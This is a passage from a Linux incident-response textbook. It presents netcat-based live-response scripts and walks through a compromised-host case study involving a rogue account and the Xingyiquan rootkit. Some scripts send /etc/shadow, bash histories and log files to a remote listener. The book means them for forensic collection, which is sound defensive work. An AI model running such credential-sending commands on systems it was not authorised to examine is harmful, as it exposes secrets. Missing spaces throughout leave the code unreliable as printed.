#PentesterAcademy.com.

#defaultsprimarilyfortesting

[-z“$RHOST”]&&{exportRHOST=localhost;}

[-z“$RPORT”]&&{exportRPORT=4444;}

usage(){

echo“usage:$0<commandorscript>”

echo“Simplescripttosendalogentrytolistener”

exit1

}

#didyouspecifyacommand?

if[$#-lt1];then

usage

else

echo-e“++++Sendinglogfor$@at$(date)++++\n$($@)\n–-end–-\n”|nc$RHOST$RPORT

fi

ThescriptstartsoutwithacoupleoflinesthatwillsetRHOSTandRPORTtodefaultvaluesiftheyhavenotalreadybeenset.Theselinesdemonstrateapowerfultechniquetouseinyourshellscriptsknownasshortcircuiting.Theline[-z“$RHOST”]&&{exportRHOST=localhost;}consistsof twostatementsseparatedbythe logicalANDoperator. The first half tests theRHOST environment variable to see if it is zero(nullorunset).Noticethatthevariablecompletewiththeleading$isenclosedindoublequotes. This forces the shell to interpret this value as a string for the test to work asexpected. If the statement doesn’t evaluate to true there is no reason tobotherwith thesecondhalfofthelinesoitisskipped(shortcircuited).Thecurlybracketsinthesecondhalfareusedtoexplicitlygroupeverythingtogetherinastatement.

NOTJUSTFORSCRIPTSShortcircuitingisusefulinmanyplacesShort circuiting isn’t just for scripts. It can be usefulwhen you have a series ofcommands that might take a while to run when each command depends on thesuccess of the command before it. For example, the commandsudoapt-getupdate&&sudoapt-get-yupgradewillfirstupdatethelocalsoftwarerepositorycacheand thenupgradeanypackages thathavenewerversions.The-yoptionautomaticallysaysyestoanyprompts.Ifyouareunabletoconnecttoyourrepositoriesforsomereasontheupgradecommandisneverexecuted.

Another common use of this technique is building software from sourcewhenyoudonotwanttositaroundandwaittoseeifeachstagecompletessuccessfully.Manypackages requireaconfigure script tobe run that checksdependenciesandoptionally sets some non-default options (such as library and tool locations),followedbyamake andsudomakeinstall. It can take some time for allthree stages to complete. The command./configure&&make&&sudomakeinstallcanbeusedtodothisallononeline.

The only real work done in this script is in the echo line near the bottom.We havealreadyseentheechocommand,butthereareafewnewthingsonthisline.First,echohasa-eoption.Theoptionenablesinterpretationofbackslashcharacters.Thisallowsustoputnewlines(\n)inourstringinordertoproducemultiplelinesofoutputwithasingleechocommand.

Thereareacouplereasonswhywewanttouseasingleechocommandhere.First,wewillbepassing(pipingactually)theresultstothenetcattalkerwhichwillsendthisdata

toour forensicsworkstation.Wewant thisdoneasoneatomic transaction.Second, thisallowsamorecompactandeasilyunderstoodscript.

There is also something new in the echo string, the $@variable. $@ is equal to theentire setof command lineparameterspassed to the script.We firstuse$@ tocreate aheaderthatreads“++++Sendinglogfor{commandwithparameters}at{date}++++”.Wethenuseour$()trickyetagaintoactuallyrunthecommandandinsertitsoutputintoourstring.Finally,a“–-end–-”footerisaddedafterthecommandoutput.

Thelastclientscriptisusedtosendfilestotheforensicsworkstationforanalysis.Itwillmakealogentry,thensendthefilenametotheappropriateport,thendelayafewsecondstogivetheservertimetocreatealistenertoreceivethefile,andfinallysendthefile.Thescriptfordoingthisfollows.#send-file.sh

#

#Simplescripttosendanewfile

#tolisteneronforensicsworkstation.Intendedtobe

#usedaspartofinitialliveresponse.

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

#defaultsprimarilyfortesting

[-z“$RHOST”]&&{exportRHOST=localhost;}

[-z“$RPORT”]&&{exportRPORT=4444;}

[-z“$RFPORT”]&&{exportRFPORT=5555;}

[-z“$RFTPORT”]&&{exportRFTPORT=5556;}

usage(){

echo“usage:$0<filename>”

echo“Simplescripttosendafiletolistener”

exit1

}

#didyouspecifyafile?

if[$#-lt1];then

usage

fi

#logit

echo“Attemptingtosendfile$1at$(date)”|nc$RHOST$RPORT

#sendname

echo$(basename$1)|nc$RHOST$RFPORT

#giveittime

sleep5

nc$RHOST$RFTPORT<$1

Aswiththeotherclientscripts,thereisnoshe-bangatthebeginningofthescriptsoit

mustberunmanuallyby typingbash./send-file.sh{filename}.The shortcircuitingtechniqueisagainusedtosetenvironmentvariablestodefaultsiftheyhavenotbeenset.Thescript isverystraightforward.First, thenumberofparameterspassedinischecked,andifnofilenamewaspassedin,theusagestatementisdisplayed.Second,thefilename is echoed to the filename listenerwhichcauses the server to start a listener toreceivethefile.Notethatthebasenamecommandisusedtostripanyleadingpathfromthe filename (the fullpathdoesappear in the log,however).Third, the script sleeps forfivesecondstoallowtheservertimetostartthelistener.Thisisprobablynotneeded,butitiswellworthwaitingafewsecondstohaveareliablescript.Finally,thefileissenttothefilelistenerandthenthescriptexits.

INTRODUCINGOURFIRSTSUBJECTSYSTEMThroughoutthisbookwewillworkthroughafewexamplesubjectsystems.Ifyouwishtofollow along, youmay download the example images from http://philpolstra.com. Thiswebsiteisalsotheplacetogetupdatesandothermaterialsfromthisbook(andalsopastand future books).To keep things simple Iwill install this example system in a virtualmachine using VirtualBox running on my Ubuntu 14.04 computer. Recall that I saidearlierinthisbookthatusingaUSB2.0responsedriveislessproblematicwhentryingtomountthedriveinavirtualmachine.

OurfirstexampleisalsoanUbuntu14.0464-bitsystem.Youhavereceivedacallfromyournewclient,adevelopmentshopknownasPhil’sFuturisticEdutainment(PFE)LLC.Yourinitialinterviewsrevealedthatoneoftheleaddeveloper’scomputershasbeenactingstrangelyandPFEsuspects themachinehasbeenhacked.Theyhaveno in-houseLinuxforensicspeoplesoyouwerecalledin.OneofthethingsthatseemstobehappeningonthesubjectsystemisthatwarningsuchasthosefromFigure2.13keeppoppingup.

FIGURE2.13

Suspicioussystemwarningsonsubjectsystem.

Oneof the first thingsyouneed todowith the subject system ismountyourknown-goodbinaries.ThestepsrequiredareshowninFigure2.14.Theifconfigutilityisalsorunasaverificationthateverythingisworkingcorrectly.

FIGURE2.14

Mountingaresponsedriveandloadingaknown-goodshellandbinaries.

Asequenceofcommandstoruntheknow-goodbinariesandthenusetheaboveclientscripts is shown in Figure 2.15. Some of the results that appear on the forensicsworkstationareshowninFigure2.16andFigure2.17.

FIGURE2.15

Mountingknow-goodbinariesandthenrunningsomeclientscriptsonthesubjectsystem.

FIGURE2.16

PartiallogentryforforthecommandsshowninFigure2.15.

FIGURE2.17

FilescreatedbythecommandsinFigure2.15.

COLLECTINGVOLATILEDATAThereisplentyofvolatiledatathatcanbecollectedfromthesubjectsystem.Collectingthisdatawillhelpyoumakeapreliminarydeterminationastowhetherornottherewasanincident. Some of the more common pieces of data you should collect are discussedbelow.

DateandtimeinformationOneof the first thingsyouwant to collect is thedate and time information.Why?Thesubjectsystemmightbeinadifferenttimezonefromyourusuallocation.Also,computerclocksareknowntobebadatkeepinggoodtime.Ifthesystemhasnotbeensynchronizedwithatimeserverrecentlytheclockcouldbeoff,andyouwillwanttonotethisskewtoadjust times inyour reports.Despite itsname, thedate commandoutputsnotonly thedate,butthetimeandtimezoneaswell.

OperatingsystemversionYouwill need to know the exact operating system and kernel version you are runningshouldyou laterdecide todomemoryanalysis.Theuname-acommandwillprovideyouwith this information and also themachine name and kernel build timestamp. TheresultsofrunningthiscommandonthePFEsubjectsystemareshowninFigure2.18.

FIGURE2.18

Resultsofrunningunameonasubjectsystem.

NetworkinterfacesWhat network interfaces are on the machine? Is there anything new that shouldn’t bethere?Thismightsoundlikeastrangequestion,butanattackerwithphysicalaccesscouldadd awireless interface orUSB interface pretty easily.Other strange but less commoninterfacesareapossibility.

Whataddresseshavebeenassignedtovariousinterfaces?Whataboutthenetmask?Hassomeonetakenanetworkinterfacedowninordertohavetrafficroutedthroughsomethingtheycontrolormonitor?Allofthesequestionsareeasilyansweredusingtheifconfig-acommand.Theresultsofrunningifconfig-aonthesubjectsystemareshowninFigure2.19.

FIGURE2.19

Resultsfromtheifconfig-acommand.

NetworkconnectionsWhatothermachinesaretalkingwiththesubjectmachine?Arethereanysuspiciouslocalnetworkconnections?IsthesystemconnectingtosomethingontheInternetwhenitisnotsupposedtohavesuchaccess?Thesequestionsandmorecanbeansweredbyrunningthenetstat-anpcommand.Theoptionsa,n,andpareusedtospecifyallsockets,useonly numeric IPs (do not resolve host names), and display process identifiers andprograms,respectively.

OpenportsArethereanysuspiciousopenports?Isthesystemconnectingtoportsonanothermachinethatisknowntobeusedbymalware?Thesequestionsarealsoeasilyansweredbyrunningthe netstat -anp command. The results of running this command on the subjectsystemareshowninFigure2.20.

FIGURE2.20

Resultsofrunningnetstat-anponthesubjectsystem.

Malwarecanaffectanyofthecommandsyouarerunningduringyourinitialscanofthesubject system. This is true even with know-good binaries as underlying memorystructuresmaybealteredbyrootkitsandthelike.Theresultsofrunningnetstat-anpon thesubjectsystemaftera rootkit is installedareshowninFigure2.21.Note that thenetstatprocessiskilledandasystemwarningisalsodisplayed.Everycommandthatfailslikethisincreasestheprobabilitythatthemachinehasbeencompromised.

FIGURE2.21

Theresultsofrunningnetstat-anpafterarootkithasbeeninstalled.

ProgramsassociatedwithvariousportsSomeportsareknowntobehometomaliciousservices.Evensafeportscanbeusedbyother processes.The output ofnetstat-anp can be used to detect programs usingportstheyshouldnotbeusing.Forexample,malwarecoulduseport80asitwilllooklikewebtraffictoacasualobserver.

OpenFilesIn addition to asking which programs are using what ports, it can be insightful to seewhich programs are opening certain files. Thelsof-V (list open files with Verbosesearch)commandprovidesthisinformation.TheresultsofrunningthiscommandonthesubjectsystemareshowninFigure2.22.Aswiththenetstatcommand,thiswillfailifcertainrootkitsareinstalled.

FIGURE2.22

Results of running lsof -V on subject system. Note that this command failed when it was rerun afterinstallationofarootkit(XingYiQuan).

RunningProcessesArethereanysuspiciousprocessesrunning?Are there thingsbeingrunby therootuserthat should not be? Are system accounts that are not allowed to login running shells?These questions andmore can be answered by running theps-ef command. The -eoption lists processes for everyone and -f gives a full (long) listing. This is another

command that might fail if a rootkit has been installed. Partial results of running thiscommandonthesubjectsystemareshowninFigure2.23.

FIGURE2.23

Resultsofrunningps-efonthesubjectsystem.

RoutingTablesIs your traffic being rerouted through an interface controlled and/or monitored by anattacker?Haveanygatewaysbeenchanged?Theseandotherquestionscanbeansweredby examining the routing table.There ismore thanoneway to obtain this information.Twoofthesewaysaretousethenetstat-rnandroutecommands. I recommendrunningbothcommandsasarootkitmightalertyoutoitspresencebyalteringtheresultsofoneorbothofthesecommands.Ifyougetconflictingresultsitisstrongevidenceofacompromise.The results of running both of these commands on the subject system areshowninFigure2.24.

FIGURE2.24

Resultsofrunningnetstat-rnandrouteonthesubjectsystem.

MountedfilesystemsAreanysuspiciousvolumesmountedon thesystem?Isoneof thefilesystemssuddenlyfillingup?Whatarethepermissionsandoptionsusedtomounteachpartition?Arethereunusualtemporaryfilesystemsthatwillvanishwhenthesystemisrebooted?Thedf(diskfree)andmountcommandscananswerthesetypesofquestions.

Aswithmanyothercommands,arootkitmightaltertheresultsofoneorbothofthesecommands. Whenever two utilities disagree it is strong evidence of a compromisedsystem.TheresultsofrunningdfandmountonthesubjectsystemareshowninFigure2.25.

FIGURE2.25

Resultsofrunningdfandmountonthesubjectsystem.

LoadedkernelmodulesAre there any trojaned kernelmodules? Are there any device drivers installed that theclientdoesnotknowanythingabout?Thelsmod commandprovides a list of installedkernelmodules.PartialresultsfromrunninglsmodareshowninFigure2.26.

FIGURE2.26

Partialresultsofrunninglsmodonthesubjectsystem.

UserspastandpresentWhoiscurrentlyloggedin?Whatcommanddideachuserlastrun?Thesequestionscanbeansweredbythewcommand.Forthosewhoarenotfamiliar,w issimilartothewhocommand,butitprovidesadditionalinformation.ResultsforthewcommandareshowninFigure2.27.

FIGURE2.27

Resultsofrunningthewcommandonthesubjectsystem.

Whohasbeenlogginginrecently?Thisquestionisansweredbythelastcommand.Alist of failed login attempts can be obtained using the lastb command. The lastcommandlistswhenuserswereloggedin,ifthesystemcrashedorwasshutdownwhileauserwasloggedin,andwhenthesystemwasbooted.PartialresultsfromrunninglastareshowninFigure2.28.NotethattherearemultiplesuspiciousloginsonMarch9th.Anewuserjohnnwhoshouldnotexisthasloggedonashastheligthdmsystemaccount.

FIGURE2.28

Partial results of running last on the subject system. The logins by johnn and lightdm are indicators of acompromise.

TheresultsfromrunninglastbonthesubjectsystemareshowninFigure2.29.FromthefigureitcanbeseenthatJohnstruggledtorememberhispasswordonMay20th.ThemuchmoreinterestingthingthatcanbeseenisthatthelightdmaccounthadafailedloginonMarch9th.Whenyoucombinethis informationwiththeresultsfromlast, itwouldappearthatanattackerwastestingthisnewaccountanddidnotcorrectlysetthingsupthefirsttime.Furthermore,itseemslikelythejohnaccountwasusedbytheattacker.

FIGURE2.29

Arethereanynewaccountscreatedbyanattacker?Hassomeonemodifiedaccountstoallow system accounts to login?Was the system compromised because a user had aninsecurepassword?Examinationofthe/etc/passwdand/etc/shadowfileshelpyouanswerthesequestions.

A partial listing of the /etc/passwd file can be found in Figure 2.30. Notice thehighlightedportionisforthejohnnaccount.ItappearsasthoughanattackercreatedthiscountandtriedtomakeitlookalotlikethejohnaccountforJohnSmith.Alsoofnoteisthehiddenhomedirectoryforjohnnlocatedat/home/.johnn.

FIGURE2.30

Partial listingof/etc/passwdfilefromsubjectsystem.Thehighlightedlineisforanewjohnnaccountwhichappearsatfirstglancetobethesameasjohn.Notethehiddenhomedirectory.

Looking at the line for the lightdm account in Figure 2.30we observe that the loginshellhasbeensetto/bin/false.Thisisacommontechniqueusedtodisableloginofsomesystemaccounts.From thelast command results it is clear that this userwas able tologin.Thisiscauseforinvestigationofthe/bin/falsebinary.

PuttingittogetherwithscriptingThereisnogoodreasontotypeallofthecommandsmentionedabovebyhand.Sinceyoualready are mounting a drive with your know-good binaries, it makes sense to have ascript todoall theworkforyouonyourresponsedrive.Asimplescript foryour initialscanfollows.Thescriptisstraightforwardandprimarilyconsistsofcallingthesend-log.shscriptpresentedearlierinthischapter.#initial-scan.sh

#

#Simplescripttocollectbasicinformationaspartof

#initialliveincidentresponse.

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

usage(){

echo“usage:$0[listeninghost]”

echo“Simplescripttosendalogentrytolistener”

exit1

}

#didyouspecifyalistenerIP?

if[$#-gt1]||[“$1”==“—help”];then

usage

fi

#didyouspecifyalistenerIP?

if[“$1”!=“”];then

sourcesetup-client.sh$1

fi

#nowcollectsomeinfo!

send-log.shdate

send-log.shuname-a

send-log.shifconfig-a

send-log.shnetstat-anp

send-log.shlsof-V

send-log.shps-ef

send-log.shnetstat-rn

send-log.shroute

send-log.shlsmod

send-log.shdf

send-log.shmount

send-log.shw

send-log.shlast

send-log.shlastb

send-log.shcat/etc/passwd

send-log.shcat/etc/shadow

SUMMARYWehavecoveredquiteabitinthischapter.Waysofminimizingdisturbancetoasubjectsystemwhiledeterminingiftherewasanincidentwerediscussed.Severalscriptstomakethiseasywerepresented.Weendedthischapterwithasetofscriptsthatcanallowyoutodetermineiftherewasacompromiseinmereminutes.Inthenextchapterwewilldiscussperformingafullliveanalysisonceyouhavedeterminedthatanincidentoccurred.

CHAPTER

3LiveAnalysisINFORMATIONINTHISCHAPTER:

FilemetadataTimelinesUsercommandhistoryLogfileanalysisHashingDumpingRAMAutomationwithscripting

THEREWASANINCIDENT:NOWWHAT?Basedoninterviewswiththeclientandlimitedliveresponseyouareconvincedtherehasbeenanincident.Nowwhat?Nowitistimetodelvedeeperintothesubjectsystembeforedecidingifitmustbeshutdownfordeadanalysis.TheinvestigationhasnowmovedintothenextboxasshowninFigure3.1.

FIGURE3.1

TheHigh-levelInvestigationProcess.

Somesystemscanbeshutdownwithminimalbusinessdisruption.Inourexamplecasethesubjectsystemisadeveloperworkstationwhichisnormallynotterriblypainfultotake

offline. The only person affected by this is the developer. His or her productivity hasalreadybeenaffectedbymalwarewehavediscovered.InacaselikethisyoumightdecidetodumptheRAMandproceedtodeadanalysis.Ifthisiswhatyouhavechosentodo,youcansafelyskipaheadtothesectionofthischapterondumpingRAM.

GETTINGFILEMETADATAAtthispointintheinvestigationyoushouldhavearoughideaofapproximatelywhenanincidentmayhaveoccurred. It is not unusual to startwith some systemdirectories andthen go back to examine other areas based on what you find. It is the nature ofinvestigationsthatyouwillfindlittlebitsofevidencethatleadyoutootherlittlebitsofevidenceandsoon.

A good place to start the live analysis is to collect file metadata which includestimestamps, permissions, file owners, and file sizes. Keep inmind that a sophisticatedattackermight alter this information. In the dead analysis section of this bookwewilldiscusswaysofdetectingthisandhowtorecoversomemetadatathatisnoteasilyalteredwithoutspecializedtools.

Asalways,wewillleveragescriptingtomakethistaskeasierandminimizethechancesformistakes.ThefollowingscriptbuildsonshellscriptsfromChapter2inordertosendfilemetadatatotheforensicsworkstation.Thedataissentinsemicolondelimitedformattomakeiteasiertoimportintoaspreadsheetforanalysis.#send-fileinfo.sh

#

#Simplescripttocollectfileinformationaspartof

#initialliveincidentresponse.

#Warning:Thisscriptmighttakealongtimetorun!

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

usage(){

echo“usage:$0<startingdirectory>”

echo“Simplescripttosendfileinformationtoaloglistener”

exit1

}

if[$#-lt1];then

usage

fi

#semicolondelimitedfilewhichmakesimporttospreadsheeteasier

#printfisaccessdate,accesstime,modifydate,modifytime,

#createdate,createtime,permissions,userid,username,

#groupid,groupname,filesize,filenameandthenlinefeed

#ifyouwantnicecolumnlabelsinyourspreadsheet,pastethefollowing

#line(minus#)atstartofyourCSVfile

#AccessDate;AccessTime;ModifyDate;ModifyTime;CreateDate;CreateTime;Permissions;UID;Username;GID;Groupname;Size;File

send-log.shfind$1-printf“%Ax;%AT;%Tx;%TT;%Cx;%CT;%m;%U;%u;%G;%g;%s;%p\n”

Thescripttakesastartingdirectorybecauseyouprobablywanttolimitthescopeofthiscommandasit takesawhiletorun.Alloftherealworkinthisscript is intheverylastline.Manyreadershavelikelyusedthefindutilityinitssimplestformwhichprintsoutthenamesoffoundfiles.Thefindcommandiscapableofsomuchmoreaswewillseelaterinthischapter.Heretheprintfoptionhasbeenusedwhichallowsfoundfileattributestobeprintedinaspecifiedformat.Consultthefindmanpage(accessiblebytypingmanfind ina terminal) for thecomplete listof formatcodes ifyouwant tocustomize thisscript.

AportionofwhatisreceivedbytheforensicsworkstationwhenthisscriptisrunonthesubjectsystemisshowninFigure3.2.Thehighlightedlineisfor/bin/false.Accordingtothis information it was modified onMarch 9th, the date of the suspected compromise.Looking five lines above this entry reveals that false is exactly the same size as bashwhichmakesnosenseforaprogramthatonlyexiststoreturnavalue.Thefalseprogramisfourtimesthesizeofthetrueprogramwhichalsoexistsonlytoreturnavalue.

FIGURE3.2

Partialresultsfromrunningsend-fileinfo.shon/bindirectory.Thehighlightedlineindicatesthat/bin/falsewasmodified about the time of the compromise. Also suspicious is the fact that the file sizematches that of/bin/bashfivelinesaboveit.

USINGASPREADSHEETPROGRAMTOBUILDATIMELINEShouldyoudecidetoperformafulldeadanalysisacompletetimelinecanbebuiltusingtechniquesdescribedlaterinthisbook.Atthisstageoftheinvestigationhavingafilelist

thatcanbe sortedbymodification,creation,andaccess timesbasedonoutput from thescript in theprevioussectioncanbehelpful.Whilenotasniceasaproper timeline thatintertwinesthesetimestamps,itcanbecreatedinamatterofminutes.

Thefirststep is toopen the log.txt file for thecase inyourfavorite texteditoron theforensicsworkstation. If youwould like headers on your columns (recommended) thenalsocutandpaste thecomment from thesend-fileinfo.shscript,minus the leading#,asindicated.Savethefilewitha.csvextensionandthenopenitinLibreOfficeCalc(oryourfavorite spreadsheet program).Youwill begreetedwith a screen such as that shown inFigure3.3.Clickoneachcolumnandsetitstypeasshowninthefigure.Failuretodothiswillcausedatesandtimestobesortedalphabeticallywhichisnotwhatyouwant.

FIGURE3.3

ImportingaCSV filewith filemetadata intoLibreOfficeCalc.Note thateachcolumn typeshouldbeset to

allowforpropersorting.

Oncethefilehasbeenimporteditiseasilysortedbyselectingallofthepertinentrowsand then choosing sort from the data menu. The columns are most easily selected byclickinganddraggingacrossthecolumnletters(whichshouldbeA-M)atthetopofthespreadsheet.TheappropriatesortcommandstosortbydescendingaccesstimeisshowninFigure3.4.

FIGURE3.4

Sortingfilemetadatabyaccesstime.

Asimilar technique canbeused to sort bymodificationor creation time. Itmight bedesirable to copy andpaste this spreadsheet ontomultiple tabs (technicallyworksheets)and save the resulting workbook as a regular Calc file. The easiest way to copyinformationtoanewsheetistoclickintheblanksquareintheupperleftcorner(abovethe1 and to the left of theA), pressControl-C, go to the new sheet, click in the sameupperlefthandsquare,andthenpressControl-V.

ThecreationtimetabofsuchaspreadsheetforoursubjectsystemisshowninFigure3.5.Thehighlightedrowsshowthatthesuspicious/bin/falsefilewascreatedaroundthetimeofourcompromiseand that theXingYiQuanrootkithasbeen installed.Note thatsomeoftherootkitfileshaveaccesstimestampsaroundthetimeofthecompromise,yetthey have been created and modified later, at least according to the possibly altered

metadata.

FIGURE3.5

Filemetadataforthe/bindirectorysortedbycreationtimestamps.Thehighlightedrowsshowthat/bin/falsewasalteredaboutthetimeofourcompromiseandthattheXingYiQuanrootkitappearstobeinstalled.

EXAMININGUSERCOMMANDHISTORYThebash(BourneAgainShell)shellisthemostpopularoptionamongLinuxusers.Itisfrequently the default shell. Bash stores users’ command histories in the hidden.bash_historyfileintheirhomedirectories.Thefollowingscriptusesthefindutilitytosearchforthesehistoryfilesinhomedirectories,includingtherootuser’shomedirectoryof/root.Asophisticatedattackerwilldeletethesesfilesand/orsettheirmaximumsizetozero.Fortunatelyfortheinvestigator,notallattackersknowtodothis.#send-history.sh

#

#Simplescripttosendalluserbashhistoryfilesaspartof

#initialliveincidentresponse.

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

usage(){

echo“usage:$0“

echo“Simplescripttosenduserhistoryfilestoaloglistener”

exit1

}

if[$#-gt0];then

usage

fi

#findonlyfiles,filenameis.bash_history

#executeecho,cat,andechoforallfilesfound

send-log.shfind/home-typef-regextypeposix-extended-regex\

‘/home/[a-zA-Z.]+/.bash_history’\

-exececho-e“–dumpinghistoryfile{}–\n”\;\

-execcat{}\;-exececho-e“–endofdumpforhistoryfile{}–\n”\;

#repeatfortheadminuser

send-log.shfind/root-typef-maxdepth1-regextypeposix-extended\

-regex‘/root/.bash_history’\

-exececho-e“–dumpinghistoryfile{}–\n”\;\

-execcat{}\;-exececho-e“–endofdumpforhistoryfile{}–\n”\;

This code requires a little explanation. The easiest new thing to explain is the \charactersattheendofsomelines.Thesearelinecontinuationcharacters.Thisallowsthescript to be more readable, especially when printed in this book. This same linecontinuationcharactercanbeusedinotherscriptinglanguagessuchasPython,althoughitisnotnecessarilythepreferredmethodforthoselanguages.

Nowthatwehavedescribedthe\characters,let’stacklesomeoftheharderpartsofthisscript.We’llbreakdownthefindcommandpiecebypiece.Findhastheabilitytosearchby file type. The commandfind/home-typef instructsfind to search under/homeforregularfiles(notdirectories,devices,etc.).

Inadditiontofindingfilesbyname,findallowsregularexpressionstobeusedforthefilename. If you are not familiar with regular expressions, they are powerful ways ofdefiningpatterns.Acomplete tutorialon regular expressions, alsocalled regexs, iswellbeyond the scope of this book. There are a number of online resources, such ashttp://www.regular-expressions.info/, for those wanting to know more. The bookMasteringRegularExpressionsbyJeffreyE.F.Friedl(O’Reilly,2006)isagreatresourceforthosethatpreferabook.

In regular expressions we have characters that match themselves (literals) and thosewith specialmeaning (metacharacters).Within the setofmetacharacterswehave thingsthatmatch,anchors,andquantityspecifiers.Occasionallywewanttotreatmetacharactersas literals and we do this by escaping them. Escaping a character is as simple asprependingthe\characterbeforeit.

Some of the more common matching metacharacters are character classes (lists ofcharactersinsidesquarebrackets)andtheperiodwhichmatchanycharacterinthelistandany character except a newline, respectively. Because the period is a metacharacter, itmust be escaped when you want to match a period, as is the case with the regularexpressioninthisscript.

Someof themost usedquantity specifiers include*,+, and ?which indicate zero ormore,oneormore, andzeroorone, respectively.Quantity specifiers apply to the thing

(literalcharacter,metacharacter,orgrouping) justbefore them.Forexample, the regularexpressionA+meansoneormorecapitalA’s.Asanotherexample, [A-Z]?[a-z]+wouldmatchanywordthatiswritteninalllowercaseletterswiththepossibleexceptionofthefirstletter(breakingitdownitiszerooroneuppercaselettersfollowedbyoneormorelowercaseletters).

Itiseasytounderstandtheregularexpressioninourscriptifwebreakitdownintothreeparts. The first part “/home/” is a literal string that matches the main directory whereusers’ home directories are stored. The second part “[a-zA-Z.]+”matches one ormorelower case letters orupper case letters or aperiod.This shouldmatchvalidusernames.The final portion is another literal string, but this timewith a period escaped. In otherwords,theregularexpression“/.bash_history”matchestheliteralstring“/.bash_history”.

Theremainderof thefindcommandruns threecommandsforeachfile foundusingthe -exec option. Anywhere you see “{}” thefind command will replace it with thenameofthefilefound.Onceyouknowthat,itiseasytounderstandhowthisworks.Firstweechoaheaderthatincludesthefilename.Thenwecat(type)thefilewiththesecond-exec.Finally,afooterisaddedtotheoutput.Afteralloftheregularuserhomedirectorieshavebeenscanned,aslightlymodifiedfindcommandisruntoprintouttherootuser’sbashhistoryifitexists.

AportionofthejohnusersbashhistoryisshowninFigure3.6.Itwouldappearthattheattackertriedtousesed(scriptededitor)tomodifythe/etc/passwdfile.Itseemsthatheorshehadsometroubleastheyalsolookedatthemanpageforsedandultimatelyjustusedvi. A few lines down in this history filewe see theXingYiQuan rootkit beinginstalledand thels commandbeingused toverify that thedirectory intowhich itwasdownloadedishidden.

FIGURE3.6

Partofjohnuser’sbashhistory.Thelinesnearthetopindicateanattempttomodifythenewjohnnaccountinformation.Furtherdownweseecommandsassociatedwiththeinstallationofarootkit.

GETTINGLOGFILESUnlikeWindows,Linuxstillusesplaintextlogfilesinmanycases.Theselogscanusuallybe found in the /var/log directory. Some are found in this directory while others arelocated in subdirectories. Most logs will have a .log extension or no extension. It iscommonpracticetosaveseveralolderversionsofcertainlogs.Thesearchivedlogshavethesamebase filename,but .n,wheren isapositivenumber,added.Someof theolderlogsarealsocompressedwithgzipgivingthema .gzextensionaswell.Forexample, ifthe log file is named “my.log” the most recent archivemight be “my.log.1” and olderarchivesnamed“my.log.2.gz”,“my.log.3.gz”,etc.

Thescriptbelowwillusethefindutilitytoretrievecurrentlogfilesfromthesubjectsystemandsendthemtotheforensicsworkstation.Ifafterexaminingthecurrentlogsyoudetermine theydon’t cover a relevant timeperiod for your investigation (whichusuallymeanstheyshouldhavecalledyoumuchearlier)youcaneasilyusethesend-file.shscriptpresentedearliertosendwhateveradditionallogsyoudeemnecessary.Ofcourse,ifyouhavemadethedecisiontoperformadeadanalysisyouarelikelybetteroffjustwaitingtolookattheselaterasthetoolsavailablefordeadanalysismakethismucheasier.#send-logfiles.sh

#

#Simplescripttosendalllogsaspartof

#initialliveincidentresponse.

#Warning:Thisscriptmighttakealongtimetorun!

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

usage(){

echo“usage:$0“

echo“Simplescripttosendlogfilestoaloglistener”

exit1

}

if[$#-gt0];then

usage

fi

#findonlyfiles,excludefileswithnumbersastheyareoldlogs

#executeecho,cat,andechoforallfilesfound

send-log.shfind/var/log-typef-regextypeposix-extended\

-regex‘/var/log/[a-zA-Z.]+(/[a-zA-Z.]+)*’\

-exececho-e“–dumpinglogfile{}–\n”\;\

-execcat{}\;-exececho-e“–endofdumpforlogfile{}–\n”\;

Thisscriptusesthesameelementsasthepreviousbashhistorygrabbingscriptwithoneexception.Thereissomethingnewintheregularexpression.Parentheseshavebeenusedtogroupthingstogetherinordertoapplythe*quantifier(zeroormore).Ifwebreaktheregularexpressionintothreepartsitiseasiertounderstand.

Thefirstpart“/var/log/”matchestheliteralstringthatisthenormaldirectorywherelogfiles can be found. The second chunk “[a-zA-Z.]+” matches one or more letters or aperiod.Thiswillmatchanycurrentlogfilesordirectorieswhileexcludingarchivedlogs(because numbers are not included in the square brackets). The final portion “(/[a-zA-Z.]+)*”isthesameasthesecondchunk,butitisenclosedinparenthesesandfollowedby*.Thisgroupingcausesthe*quantifier(zeroormore)tobeappliedtoeverythingintheparentheses.Thezerocasematcheslogsthatarein/var/log,theonecasematcheslogsoneleveldowninasubdirectory,etc.

PartofthelogfilesforoursubjectsystemareshowninFigure3.7.Intheupperpartofthe figure you can see the tail of the dmesg (devicemessage) log.Notice that this logdoesn’tusetimestamps.Rather,itusessecondssinceboot.Thestartofthesyslog(systemlog) is shown in the lower portion of the figure. It can be seen that syslog does usetimestamps.Thereareotherlogsthatprovidenotimeinformationwhatsoever.Similartobashhistory,suchlogsonlyprovidetheorderinwhichthingsweredone.

FIGURE3.7

Partof the log filesdump from thesubjectsystem.Notice thatsome logscontain timestampswhileotherscontainsecondssincebootornotimeinformationatall.

COLLECTINGFILEHASHESThereareanumberofhashdatabasesontheInternetthatcontainhashesforknown-good

andknown-badfiles.Isthisthebestwayoffindingmalware?Absolutelynot!Thatsaid,checking hashes is super quick compared to analyzing fileswith anti-virus software orattemptingtoreverseengineerthem.Agoodhashdatabaseallowsyoutoeliminatealargenumberof files fromconsideration.Occasionallyyoumight findmalwareusinghashes.Reducing the number of files you are forced to look at by eliminating know-good filesfromyouranalysisismuchmoreuseful,however.

Two popular free hash databases includehttps://www.owasp.org/index.php/OWASP_File_Hash_Repository by the Open WebApplicationsSecurityProject(OWASP),andhttp://www.nsrl.nist.gov/ fromtheNationalInstitute of Standards and Technology. As of this writing they both support MD5 andSHA-1. Should they support moremodern algorithms in the future the script below iseasilymodified.#send-sha1sum.sh

#

#Simplescripttocalculatesha1sumaspartof

#initialliveincidentresponse.

#Warning:Thisscriptmighttakealongtimetorun!

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

usage(){

echo“usage:$0<startingdirectory>”

echo“SimplescripttosendSHA1hashtoaloglistener”

exit1

}

if[$#-lt1];then

usage

fi

#findonlyfiles,don’tdescendtootherfilesystems,

#executecommandsha1sum-b<filename>forallfilesfound

send-log.shfind$1-xdev-typef-execsha1sum-b{}\;

